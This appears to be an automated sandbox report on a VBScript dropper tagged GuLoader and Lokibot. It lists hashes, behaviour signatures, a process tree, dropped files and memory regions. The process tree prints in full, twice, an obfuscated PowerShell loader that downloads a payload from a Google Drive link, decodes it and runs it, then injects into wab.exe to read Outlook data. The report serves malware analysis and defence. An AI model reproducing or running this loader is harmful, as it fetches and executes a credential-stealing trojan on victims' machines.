Overview

overview

10

Static

static

1

??????????...??.vbs

windows7-x64

10

??????????...??.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    140s
  • max time network
    118s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    05-09-2024 12:56

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    ?????????????????? (?????????????????????????.vbs

  • Size

    21KB

  • MD5

    1fda25d2ec636086e7ad9bc6cd47dad9

  • SHA1

    1508e030e55585c467534260dcb43ac50cbc88f7

  • SHA256

    d6c4f50e58d0d8f0e7d63c1efc9679beb855d6c27d0af1417c852b0f820a3ff6

  • SHA512

    aabfbf4d7086c8af67697d4db02989145ee9812cdced64d519905600f510d1a67d00d56de175209ce2602e31eeaf517cdddcb8f7f578eace29ef1d3d8c31e4ca

  • SSDEEP

    192:/8z8yaVDEgoxLcSJ7LXnlUeZFrQ8bOjQ8dNVDLu7gswBfpGHlehYk13jxcvhwGI/:NpUL3yezrQEIXV5sOxKCjxGYiVZ2cbg

Score
10/10
guloaderlokibotcollectioncredential_accessdiscoverydownloaderspywarestealertrojan

Malware Config

Signatures

  • Guloader,Cloudeye

    A shellcode based downloader first seen in 2020.

    downloaderguloader
  • Lokibot

    Lokibot is a Password and CryptoCoin Wallet Stealer.

    trojanspywarestealerlokibot
  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious Access or copy of Web Browser Credential store.

    credential_accessstealer
  • Blocklisted process makes network request 2 IoCs
  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
    collection
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Network Service Discovery 1 TTPs 2 IoCs

    Attempt to gather information on host's network.

    discovery
  • Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\__________________ (_________________________.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2252
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.Name) {$Varsledes++;$Sorbile+='subst';$Sorbile+='r';}$Sorbile+='ing';Function Kubikindholds($Snarfed){$Vvstypernes=$Snarfed.Length-$Varsledes;For( $Indklag=5;$Indklag -lt $Vvstypernes;$Indklag+=6){$Elevcentreret+=$Snarfed.$Sorbile.'Invoke'( $Indklag, $Varsledes);}$Elevcentreret;}function Unilobe($Cellulden){ . ($Launcelot) ($Cellulden);}$Unindifferent=Kubikindholds 'DaterMbeccaoIn opzBossaiContulSo orlEmb.paSpend/Lingb5Frost.Polyg0Dean Dusin(GobelWTnpksiGastrnCreatdHallio leliwMo,essJonno ReprNChionTPhyto Orth1Free,0Fras .Kicka0 ,rja;Morge MlsheW etoiD.strnCessm6Austr4s yrk;Klask Handlx,alla6 anlg4.nake;Genk A,eknrGangtvBlgen:Va.da1Preal2Rearr1 V,da.Marin0Nrreb)Subst TumulG,dhule hjemcrealmkAa,unoAc,di/ P,te2 nona0Quen,1Undsk0 Nske0Sibir1 P il0Ankyl1oo dd InfeFGollyi TomrrAguace A atfHoggeo helxUd li/Orake1Pir e2Enc p1Kalle.Snurr0Retur ';$nonmetaphoric=Kubikindholds 'Ac,tyUBu des Asiae Iterr Nons-Ub.haASeksugSpotme Ops nPho.otPensi ';$Obsternasiges=Kubikindholds 'naiv,hMuscotObta,tHonnip GudssErhol: nadu/Accr./RematdR.llerBeri iAndelvpoulteInge,.SjlekgBilafoAnatooU.ambgnattel S.yteBnkev.NonthcSvel.oAtenkm Grey/ v,ntuK nvoctaffe?Omhege Amatx RedepHypoaope.plrSp.kutUncom=CaucadOp.olo CritwL,ftfnAn,delUnfiboSkareaGenskdThank&Re,roiZi.zidBrneh=Raask1 indwBFletks VejnaSkm.ezUdtryKYucatUCagelmGrnsasTu.ta_Enerkz.onidiTrencPCan,irTax muRetsaOUnderBknstnQS.wmaBRecon2RetinTS.ilnL DsecVContrT,imhrQCanto9Dubleg Eu,oldekupnGnathPChromWFuli.W.rypvSSto.a ';$Lagorchestes=Kubikindholds 'Gldse> Ba.h ';$Launcelot=Kubikindholds 'KudskiUndiseAirinxDifte ';$Superfusion='Pensionsbeskatningers';$savanner = Kubikindholds 'FlotaeNa ivcNyklahRegaroDeict Heste%Imbeca Offip andep Se vdOmposaE,tontHol.taDadle% Natu\dlgs,DM.dtpa Sti tFde,aaTilkriAnsponCarpod pectuA,sensRustvtMalc,rkoloniGar veHjnesnstillsSmaas.HrelsH bevboFo.kem Co f I.tun&Guil,&Chape weede P,lac RanghBeefioPyro, OpanktWo.eg ';Unilobe (Kubikindholds ' Tese$tropagBid,rlunbruo Pr db KommaBefr,lOpskr: RidshScuttoC.ralvNotedeB.eddd RenttForbrrMa slaAfkapp OverpIschieB.omdrUguns= Linn(H stocSpildm SoledO lys valg/BelsicHorse Unjo$byttesDilleaSplejvS,lgsaAn.ronH.rpunAdjoueAnator Skid)Horse ');Unilobe (Kubikindholds 'frisk$SpringudmellRevi o Shitb ,icraLsrepl Bjer:AlarmSBowyacEcta.l .urreOsteorArgenobascotSterriarchccSup,re Flakc Parat BencoPeri,mMutisyIn.ru= Zal.$ b spOSk.erbPos isA,turt,ftereFedtsrMak wnovereaKapitsUhuemi Myogg OrieeVers.siniti.SammesUnlicpwoolmlAfstuiTi fat Byg.(,krsl$BestnLSawmaa U,twgGoingoD,strrPhil,c Ov.rh Jaeve.ortvsS nketLs tieSpr.csnorma)Jodel ');Unilobe (Kubikindholds 'Workw[,ordmNSmalfeUhaantWirel.RancoSArithe SprorFo.tuvIndtriInecocHalvve.nrecPSt.mno GodkiA inonPerift FiltMbrownaUnpaynGlassaAfsvogAr,hre PansrV,cuu] Batt:Godto:CharaSArboreTjanscKjartu Madorkaffei Aft.tFjermyAnecdPM,dderImp eoIntrat MalloForudcKllino UnfalStign Svarb=Lasto Regul[LooseNDismeeBek.otdi.em.BrfruStilste Legec ogikuForharCompli SteatLsbl.yMdeplPExcitrClyfjoCantet Klono AdrecUdsk oTytteldige.TSeraiy.athlpMang,eSda g]Itera:Zw.es: UnhuTStigml Hi,bs G.sp1Ordbo2Incom ');$Obsternasiges=$Scleroticectomy[0];$Speedaway= (Kubikindholds ' Prvn$Pittig.ltraltrpseoNonrebKon.raBrndel ,ntw: CompBSuperr MarkiMil,anInt.mkGennelRin.eeeyesos IrrisOensk=FircyNInscre SkrawDy sp- nanoOGalopbSude,jPhobieIntercBlan,tEpilo BrushSEffr y UblosZoo itgriseeDraabm Ma k. drivNHor.eeStamktLlebr. JuliW Motoe d,reb AdmiCm.sall FortiUndere L ckn,ndert');$Speedaway+=$hovedtrapper[1];Unilobe ($Speedaway);Unilobe (Kubikindholds ' Fls,$neokoBTusslrUagtsiTilrenPudd.kRame.lAnknyeo.ertsQui ts D kl.Uops.H ReaneRing.aTeenidKondee OrierSoldasSoves[ Bli,$Syll n tskroFam.lnDiv,dm NavieFluidtBushbafagblpVermihA.bejoTyrogrMinipiBlankcCance] Kapr=Halef$ ExraUCoum.n OroniRinken jarodOpponi SerifSociaf svaneH.emmrNevoyeberninStridtNitro ');$Grafisk=Kubikindholds 'Tryll$ PicqBSmurrr LeveiDefennjv,frk RevelHexageGrammsFarvesT,tma.NephiDBoomaoProgrw BergnDis.vl I,paoFiks,aProdsdCapenFHnsehio inilDalmae Deli( Reve$TilbjOSrilabFdestsBackbtPaab.eDagdrrniogtnEuspoa JustsForekiUkammgSupereRestisDoddl,Halvd$PenetCMess l Comparep,eyTr.gle Writr Fort)P,rib ';$Clayer=$hovedtrapper[0];Unilobe (Kubikindholds 'Lunke$SolrigTegnilalacroSnothbPredea Kronlklatp:AsparW Satuepim,daAlloppMetaloCh,linArbejsFr.tahunpo o,fspew CranicranknhousegLtapp=Urban(VoldtTG.fsteBedrasVandbt Sm.l-StrggPKloseaFa.llttripohN.nco Billi$HaffiCNephrlIntera UpstyForm.eFo.ler Fidd)sjld, ');while (!$Weaponshowing) {Unilobe (Kubikindholds ' Roqu$A,lergsereul SeisosekunbdisguaC,villnab.e:ImmutDPunktuGe.minVandtdRee.seS.rfsrCl.nohFremmeforaeaAntagdBeslu=Skov $ nwastblksprHe.eruDili eStrid ') ;Unilobe $Grafisk;Unilobe (Kubikindholds ' sta SElem.tCreataKomm,rSoldytBer g-LegalSSootyl HisteFlockelu tepBehag Houri4T,ist ');Unilobe (Kubikindholds 'Touph$ unkgJuleflSkubboVellib Nyttaop,ralEu,hl:LoxodWBew,aebedelaSubb,pFes.fo Besyn BedrsAkkorhFor,ioGoverwO.ocoiBickinPusteg Spro=Insul( lothT.ysiueHalsesNedsttTod,y-Pro iPkra.sa Spe,tDelilh Brdr Haa d$ GunsCVirksl Liv aRespiyGenn.e Tilsr dhoo) War, ') ;Unilobe (Kubikindholds 'Lettj$ un.eg ParalCent,oaleyabKo deaApri,l,kole:VelgrFP,ecooFirt,rAlimesIdeo.tSkifta,isvaemessirMeannkDhobeeM.nipdS,mone utils .pho2Afr g0T.bor6Jomfr=Lod,r$ latog SprolMaadeoUsurpbPrveraForhalEugen:DistrKBe,luoGjetonVrdigtKutt r ConfoUnsobl.ndept,yrenaB tses B.rttBlegs+Baill+Pe io%Forga$M croSSaty.cStilfl.ideoeDegenrHandeoGarnit valiiSupercgudsfe nmacLe,igt Cou o B,camSh.ovyOutre.PerficAs eroChemouFluepnAnilit amsa ') ;$Obsternasiges=$Scleroticectomy[$Forstaerkedes206];}$Ungaged=335988;$Broderligt=29831;Unilobe (Kubikindholds 'Skema$janusgGrocelUnwitoSlvs.bHaa daSpunsl Red.:PapirPGr.nia UndelemploeEtvrerTheocmRav.ro esti Stnin=Tipti MagneG Cl.ceSeemlt,ecid-.lotsCEkstroPlektnTrosktarchmeSupplnScotttK.lde Ask.t$U gifCPreswlAdactaE uesyOpbygeU derrUtthe ');Unilobe (Kubikindholds 'Buo s$ArthrgFast,l Tomlo IsawbM.gneasem plHersk:S bkoS ameite stdNigh.eStilloAbsurvExcureF,rdjr UndesO.cilkCimicrUdlgniPotstfPantutGensie InacnBistas Cuda Antip=Grosz Dulse[VerdeSSap.iyCoar.sVera tHalvfe B vemOvere. forlCParado.rotan jengv ,ndfecykelrBom.etWh.ck]Disin:Udtry:B vidFAktuarAesthoRituamBordkBKontoaE,flasPaludeBluff6 .nol4HeadbSIndtet SukkrP.mmii AsatnDomingDerac(Luxat$Om.avP DisaaCl.ssl un,eeBeskfrScytom.emipo In.u).vamp ');Unilobe (Kubikindholds 'opf.t$MemengObsculStry o klynbnelumaKursulWhiff:Subp,B,nbeteUpbartPackwa MicrlMill,bSlaglaPolypr Stbl Ident=Drikk Skogg[.ausaSMakroyTatersKristtMillaeStenbmTrito.MiddeT T.kmeSamlexSyndatMusel.SmreoEArle,nBlvrecparago,tormd StatiA,mban,attegUdebl]Fetis: Un e:SmokeAPartiSA itaCAirteIVersiI Be,r.ArmerGReosteDreidtTa seSstatitF,rhar OveriFar.onV.abegYameo(Fored$ SpejSSi,bei edtd.uldeeKevino Rheiv UphoeDiskrrOver sImplik PapirFinani,afetfI distIn.ogeS,allnMilkssBr om)Lustr ');Unilobe (Kubikindholds 'Aflev$Slettg ,stfl Ekspo VandbDrilaa SenalOmtal:AntipATabl,eRavior EvtroPolynl Bidfi,ilintSelvhhJohanoUnneglInteroElectgGrundyS,ofe=Strai$ N,nsBMatemeAcadet npanaBankelKnebebBarreaNglesr ,inm.EvangsVisc uRrlgnbHeu.gs acobt Uni.r pdyriDehy.nTransgT,lef(Gl,co$LiebhU dfrincrakog velsaBrdlsgBate,eFremsd erhv, .lin$ ynamBSe,asrEdriooSrlindmadeleHistorUf kslIncenistempgK,lletpande) Hype ');Unilobe $Aerolithology;"
      2⤵
      • Blocklisted process makes network request
      • Network Service Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1936
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Dataindustriens.Hom && echo t"
        3⤵
          PID:2224
        • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.Name) {$Varsledes++;$Sorbile+='subst';$Sorbile+='r';}$Sorbile+='ing';Function Kubikindholds($Snarfed){$Vvstypernes=$Snarfed.Length-$Varsledes;For( $Indklag=5;$Indklag -lt $Vvstypernes;$Indklag+=6){$Elevcentreret+=$Snarfed.$Sorbile.'Invoke'( $Indklag, $Varsledes);}$Elevcentreret;}function Unilobe($Cellulden){ . ($Launcelot) ($Cellulden);}$Unindifferent=Kubikindholds 'DaterMbeccaoIn opzBossaiContulSo orlEmb.paSpend/Lingb5Frost.Polyg0Dean Dusin(GobelWTnpksiGastrnCreatdHallio leliwMo,essJonno ReprNChionTPhyto Orth1Free,0Fras .Kicka0 ,rja;Morge MlsheW etoiD.strnCessm6Austr4s yrk;Klask Handlx,alla6 anlg4.nake;Genk A,eknrGangtvBlgen:Va.da1Preal2Rearr1 V,da.Marin0Nrreb)Subst TumulG,dhule hjemcrealmkAa,unoAc,di/ P,te2 nona0Quen,1Undsk0 Nske0Sibir1 P il0Ankyl1oo dd InfeFGollyi TomrrAguace A atfHoggeo helxUd li/Orake1Pir e2Enc p1Kalle.Snurr0Retur ';$nonmetaphoric=Kubikindholds 'Ac,tyUBu des Asiae Iterr Nons-Ub.haASeksugSpotme Ops nPho.otPensi ';$Obsternasiges=Kubikindholds 'naiv,hMuscotObta,tHonnip GudssErhol: nadu/Accr./RematdR.llerBeri iAndelvpoulteInge,.SjlekgBilafoAnatooU.ambgnattel S.yteBnkev.NonthcSvel.oAtenkm Grey/ v,ntuK nvoctaffe?Omhege Amatx RedepHypoaope.plrSp.kutUncom=CaucadOp.olo CritwL,ftfnAn,delUnfiboSkareaGenskdThank&Re,roiZi.zidBrneh=Raask1 indwBFletks VejnaSkm.ezUdtryKYucatUCagelmGrnsasTu.ta_Enerkz.onidiTrencPCan,irTax muRetsaOUnderBknstnQS.wmaBRecon2RetinTS.ilnL DsecVContrT,imhrQCanto9Dubleg Eu,oldekupnGnathPChromWFuli.W.rypvSSto.a ';$Lagorchestes=Kubikindholds 'Gldse> Ba.h ';$Launcelot=Kubikindholds 'KudskiUndiseAirinxDifte ';$Superfusion='Pensionsbeskatningers';$savanner = Kubikindholds 'FlotaeNa ivcNyklahRegaroDeict Heste%Imbeca Offip andep Se vdOmposaE,tontHol.taDadle% Natu\dlgs,DM.dtpa Sti tFde,aaTilkriAnsponCarpod pectuA,sensRustvtMalc,rkoloniGar veHjnesnstillsSmaas.HrelsH bevboFo.kem Co f I.tun&Guil,&Chape weede P,lac RanghBeefioPyro, OpanktWo.eg ';Unilobe (Kubikindholds ' Tese$tropagBid,rlunbruo Pr db KommaBefr,lOpskr: RidshScuttoC.ralvNotedeB.eddd RenttForbrrMa slaAfkapp OverpIschieB.omdrUguns= Linn(H stocSpildm SoledO lys valg/BelsicHorse Unjo$byttesDilleaSplejvS,lgsaAn.ronH.rpunAdjoueAnator Skid)Horse ');Unilobe (Kubikindholds 'frisk$SpringudmellRevi o Shitb ,icraLsrepl Bjer:AlarmSBowyacEcta.l .urreOsteorArgenobascotSterriarchccSup,re Flakc Parat BencoPeri,mMutisyIn.ru= Zal.$ b spOSk.erbPos isA,turt,ftereFedtsrMak wnovereaKapitsUhuemi Myogg OrieeVers.siniti.SammesUnlicpwoolmlAfstuiTi fat Byg.(,krsl$BestnLSawmaa U,twgGoingoD,strrPhil,c Ov.rh Jaeve.ortvsS nketLs tieSpr.csnorma)Jodel ');Unilobe (Kubikindholds 'Workw[,ordmNSmalfeUhaantWirel.RancoSArithe SprorFo.tuvIndtriInecocHalvve.nrecPSt.mno GodkiA inonPerift FiltMbrownaUnpaynGlassaAfsvogAr,hre PansrV,cuu] Batt:Godto:CharaSArboreTjanscKjartu Madorkaffei Aft.tFjermyAnecdPM,dderImp eoIntrat MalloForudcKllino UnfalStign Svarb=Lasto Regul[LooseNDismeeBek.otdi.em.BrfruStilste Legec ogikuForharCompli SteatLsbl.yMdeplPExcitrClyfjoCantet Klono AdrecUdsk oTytteldige.TSeraiy.athlpMang,eSda g]Itera:Zw.es: UnhuTStigml Hi,bs G.sp1Ordbo2Incom ');$Obsternasiges=$Scleroticectomy[0];$Speedaway= (Kubikindholds ' Prvn$Pittig.ltraltrpseoNonrebKon.raBrndel ,ntw: CompBSuperr MarkiMil,anInt.mkGennelRin.eeeyesos IrrisOensk=FircyNInscre SkrawDy sp- nanoOGalopbSude,jPhobieIntercBlan,tEpilo BrushSEffr y UblosZoo itgriseeDraabm Ma k. drivNHor.eeStamktLlebr. JuliW Motoe d,reb AdmiCm.sall FortiUndere L ckn,ndert');$Speedaway+=$hovedtrapper[1];Unilobe ($Speedaway);Unilobe (Kubikindholds ' Fls,$neokoBTusslrUagtsiTilrenPudd.kRame.lAnknyeo.ertsQui ts D kl.Uops.H ReaneRing.aTeenidKondee OrierSoldasSoves[ Bli,$Syll n tskroFam.lnDiv,dm NavieFluidtBushbafagblpVermihA.bejoTyrogrMinipiBlankcCance] Kapr=Halef$ ExraUCoum.n OroniRinken jarodOpponi SerifSociaf svaneH.emmrNevoyeberninStridtNitro ');$Grafisk=Kubikindholds 'Tryll$ PicqBSmurrr LeveiDefennjv,frk RevelHexageGrammsFarvesT,tma.NephiDBoomaoProgrw BergnDis.vl I,paoFiks,aProdsdCapenFHnsehio inilDalmae Deli( Reve$TilbjOSrilabFdestsBackbtPaab.eDagdrrniogtnEuspoa JustsForekiUkammgSupereRestisDoddl,Halvd$PenetCMess l Comparep,eyTr.gle Writr Fort)P,rib ';$Clayer=$hovedtrapper[0];Unilobe (Kubikindholds 'Lunke$SolrigTegnilalacroSnothbPredea Kronlklatp:AsparW Satuepim,daAlloppMetaloCh,linArbejsFr.tahunpo o,fspew CranicranknhousegLtapp=Urban(VoldtTG.fsteBedrasVandbt Sm.l-StrggPKloseaFa.llttripohN.nco Billi$HaffiCNephrlIntera UpstyForm.eFo.ler Fidd)sjld, ');while (!$Weaponshowing) {Unilobe (Kubikindholds ' Roqu$A,lergsereul SeisosekunbdisguaC,villnab.e:ImmutDPunktuGe.minVandtdRee.seS.rfsrCl.nohFremmeforaeaAntagdBeslu=Skov $ nwastblksprHe.eruDili eStrid ') ;Unilobe $Grafisk;Unilobe (Kubikindholds ' sta SElem.tCreataKomm,rSoldytBer g-LegalSSootyl HisteFlockelu tepBehag Houri4T,ist ');Unilobe (Kubikindholds 'Touph$ unkgJuleflSkubboVellib Nyttaop,ralEu,hl:LoxodWBew,aebedelaSubb,pFes.fo Besyn BedrsAkkorhFor,ioGoverwO.ocoiBickinPusteg Spro=Insul( lothT.ysiueHalsesNedsttTod,y-Pro iPkra.sa Spe,tDelilh Brdr Haa d$ GunsCVirksl Liv aRespiyGenn.e Tilsr dhoo) War, ') ;Unilobe (Kubikindholds 'Lettj$ un.eg ParalCent,oaleyabKo deaApri,l,kole:VelgrFP,ecooFirt,rAlimesIdeo.tSkifta,isvaemessirMeannkDhobeeM.nipdS,mone utils .pho2Afr g0T.bor6Jomfr=Lod,r$ latog SprolMaadeoUsurpbPrveraForhalEugen:DistrKBe,luoGjetonVrdigtKutt r ConfoUnsobl.ndept,yrenaB tses B.rttBlegs+Baill+Pe io%Forga$M croSSaty.cStilfl.ideoeDegenrHandeoGarnit valiiSupercgudsfe nmacLe,igt Cou o B,camSh.ovyOutre.PerficAs eroChemouFluepnAnilit amsa ') ;$Obsternasiges=$Scleroticectomy[$Forstaerkedes206];}$Ungaged=335988;$Broderligt=29831;Unilobe (Kubikindholds 'Skema$janusgGrocelUnwitoSlvs.bHaa daSpunsl Red.:PapirPGr.nia UndelemploeEtvrerTheocmRav.ro esti Stnin=Tipti MagneG Cl.ceSeemlt,ecid-.lotsCEkstroPlektnTrosktarchmeSupplnScotttK.lde Ask.t$U gifCPreswlAdactaE uesyOpbygeU derrUtthe ');Unilobe (Kubikindholds 'Buo s$ArthrgFast,l Tomlo IsawbM.gneasem plHersk:S bkoS ameite stdNigh.eStilloAbsurvExcureF,rdjr UndesO.cilkCimicrUdlgniPotstfPantutGensie InacnBistas Cuda Antip=Grosz Dulse[VerdeSSap.iyCoar.sVera tHalvfe B vemOvere. forlCParado.rotan jengv ,ndfecykelrBom.etWh.ck]Disin:Udtry:B vidFAktuarAesthoRituamBordkBKontoaE,flasPaludeBluff6 .nol4HeadbSIndtet SukkrP.mmii AsatnDomingDerac(Luxat$Om.avP DisaaCl.ssl un,eeBeskfrScytom.emipo In.u).vamp ');Unilobe (Kubikindholds 'opf.t$MemengObsculStry o klynbnelumaKursulWhiff:Subp,B,nbeteUpbartPackwa MicrlMill,bSlaglaPolypr Stbl Ident=Drikk Skogg[.ausaSMakroyTatersKristtMillaeStenbmTrito.MiddeT T.kmeSamlexSyndatMusel.SmreoEArle,nBlvrecparago,tormd StatiA,mban,attegUdebl]Fetis: Un e:SmokeAPartiSA itaCAirteIVersiI Be,r.ArmerGReosteDreidtTa seSstatitF,rhar OveriFar.onV.abegYameo(Fored$ SpejSSi,bei edtd.uldeeKevino Rheiv UphoeDiskrrOver sImplik PapirFinani,afetfI distIn.ogeS,allnMilkssBr om)Lustr ');Unilobe (Kubikindholds 'Aflev$Slettg ,stfl Ekspo VandbDrilaa SenalOmtal:AntipATabl,eRavior EvtroPolynl Bidfi,ilintSelvhhJohanoUnneglInteroElectgGrundyS,ofe=Strai$ N,nsBMatemeAcadet npanaBankelKnebebBarreaNglesr ,inm.EvangsVisc uRrlgnbHeu.gs acobt Uni.r pdyriDehy.nTransgT,lef(Gl,co$LiebhU dfrincrakog velsaBrdlsgBate,eFremsd erhv, .lin$ ynamBSe,asrEdriooSrlindmadeleHistorUf kslIncenistempgK,lletpande) Hype ');Unilobe $Aerolithology;"
          3⤵
          • Network Service Discovery
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of SetThreadContext
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2928
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Dataindustriens.Hom && echo t"
            4⤵
            • System Location Discovery: System Language Discovery
            PID:2680
          • C:\Program Files (x86)\windows mail\wab.exe
            "C:\Program Files (x86)\windows mail\wab.exe"
            4⤵
            • Accesses Microsoft Outlook profiles
            • Suspicious use of NtCreateThreadExHideFromDebugger
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            • Suspicious use of AdjustPrivilegeToken
            • outlook_office_path
            • outlook_win_path
            PID:624

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Dataindustriens.Hom
      Filesize

      476KB

      MD5

      a12f1e6450070a7f2881a51263cdfc64

      SHA1

      8079638e5132fc2af18b10559606f0771695c9fa

      SHA256

      c3e31b916fcd5901033734d674d401d6b986d80806969cdd9a9ae0faafcaa389

      SHA512

      4a35b4166e1f29b078a64745f6f8684234d17d46708556f83e60d2b010c8b8686cd058cd95e630723e8e28f18962e0aefb5bdf1552e3281ed1ee2708158caf8b

      Download Submit

    • C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-312935884-697965778-3955649944-1000\0f5007522459c86e95ffcc62f32308f1_1defa0c0-fc04-4155-83bc-b490dbaa3679
      Filesize

      46B

      MD5

      d898504a722bff1524134c6ab6a5eaa5

      SHA1

      e0fdc90c2ca2a0219c99d2758e68c18875a3e11e

      SHA256

      878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9

      SHA512

      26a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61

      Download Submit

    • C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-312935884-697965778-3955649944-1000\0f5007522459c86e95ffcc62f32308f1_1defa0c0-fc04-4155-83bc-b490dbaa3679
      Filesize

      46B

      MD5

      c07225d4e7d01d31042965f048728a0a

      SHA1

      69d70b340fd9f44c89adb9a2278df84faa9906b7

      SHA256

      8c136c7ae08020ad16fd1928e36ad335ddef8b85906d66b712fff049aa57dc9a

      SHA512

      23d3cea738e1abf561320847c39dadc8b5794d7bd8761b0457956f827a17ad2556118b909a3e6929db79980ccf156a6f58ac823cf88329e62417d2807b34b64b

      Download Submit

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\YVTURXS0OGF79TOUHMT5.temp
      Filesize

      7KB

      MD5

      734be2c84fd5002dde7a5a2b09e6e17d

      SHA1

      f5b780e325006b6c6b6a43d19a38e20a63806550

      SHA256

      7640d790ea745e1093faa7088a07b9870cd3782b302cedbe98eebdd54b0b67c9

      SHA512

      d50617c6c892b96b973f2a3ae99902a9ed8928d80b79b84f579a21e8a19edde84460f09d6f9e0f9746652c26713d39bb60a31a797000e417b4ff9cfb45332880

      Download Submit

    • memory/624-41-0x0000000000A50000-0x00000000050B4000-memory.dmp

      Filesize

      70.4MB

      Download

    • memory/624-40-0x0000000000400000-0x0000000000581000-memory.dmp

      Filesize

      1.5MB

      Download

    • memory/1936-13-0x000007FEF5A70000-0x000007FEF640D000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/1936-12-0x000007FEF5D2E000-0x000007FEF5D2F000-memory.dmp

      Filesize

      4KB

      Download

    • memory/1936-4-0x000007FEF5D2E000-0x000007FEF5D2F000-memory.dmp

      Filesize

      4KB

      Download

    • memory/1936-14-0x000007FEF5A70000-0x000007FEF640D000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/1936-10-0x000007FEF5A70000-0x000007FEF640D000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/1936-9-0x000007FEF5A70000-0x000007FEF640D000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/1936-7-0x000007FEF5A70000-0x000007FEF640D000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/1936-42-0x000007FEF5A70000-0x000007FEF640D000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/1936-8-0x000007FEF5A70000-0x000007FEF640D000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/1936-5-0x000000001B770000-0x000000001BA52000-memory.dmp

      Filesize

      2.9MB

      Download

    • memory/1936-6-0x0000000001E70000-0x0000000001E78000-memory.dmp

      Filesize

      32KB

      Download

    • memory/2928-19-0x0000000006700000-0x000000000AD64000-memory.dmp

      Filesize

      70.4MB

      Download